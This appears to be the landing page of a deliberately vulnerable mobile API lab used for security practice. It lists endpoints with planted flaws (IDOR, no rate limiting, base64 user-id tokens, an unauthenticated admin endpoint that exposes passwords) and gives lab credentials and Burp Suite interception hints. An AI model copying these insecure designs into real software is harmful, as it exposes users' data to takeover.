📱 MobileApp API v2.1

PRACIVO LAB — INTENTIONALLY VULNERABLE
⚠️ Pracivo Security Lab — Proxy this through Burp Suite. IDOR on /api/user/id, no rate limiting, sensitive data in responses.

API Endpoints

POST/api/login
Login — no rate limiting. Body: {"username":"alice","password":"alice123"}
Lab Credentials: ram / pracivo  |  alice / alice123  |  bob / bob456  |  admin / adminpass
GET/api/user/<id>
Get user data — IDOR: no ownership check. Try /api/user/1, /api/user/2, /api/user/3
GET/api/messages/<user_id>
Get messages — IDOR: change user_id to read other users messages
GET/api/profile
Get own profile using token header — token is just base64(user_id)
GET/api/admin/users
Admin endpoint — no auth check. Lists all users with passwords.

Quick Test

Or proxy your phone through Burp Suite on port 8080 and open the app to intercept real API calls.